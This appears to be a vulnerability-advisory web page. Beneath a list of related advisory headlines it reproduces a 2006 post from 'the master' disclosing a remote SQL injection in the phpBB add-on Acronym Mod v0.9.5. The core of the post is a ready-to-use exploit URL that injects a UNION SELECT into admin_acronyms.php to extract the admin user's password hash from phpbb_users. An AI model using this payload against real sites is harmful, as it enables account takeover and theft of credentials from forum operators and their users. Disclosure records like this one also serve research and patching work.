Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

ASPTicker 1.0 (admin.asp) Remote Login ByPass SQL Injection Vulnerability

Title   :  WYWO - InOut Board 1.0 Multiple Vulnerabilities

aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

x-news 1.1 Password Disclosure Vulnerability

From:	the master <le_master1_(at)_hotmail.com>
Date:	31.12.2006
Subject:	Acronym Mod v0.9.5 Remote SQL Injection Vulnerability

########################################################################
#  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability
#
#  Download: http://www.codemonkeyx.net
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_acronyms.php?mode=edit&id=-
1%20UNION%20SELECT%20null,user_password,
null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
#
#  Greetz: str0ke , Dr Max Virus , Kacper
########################################################################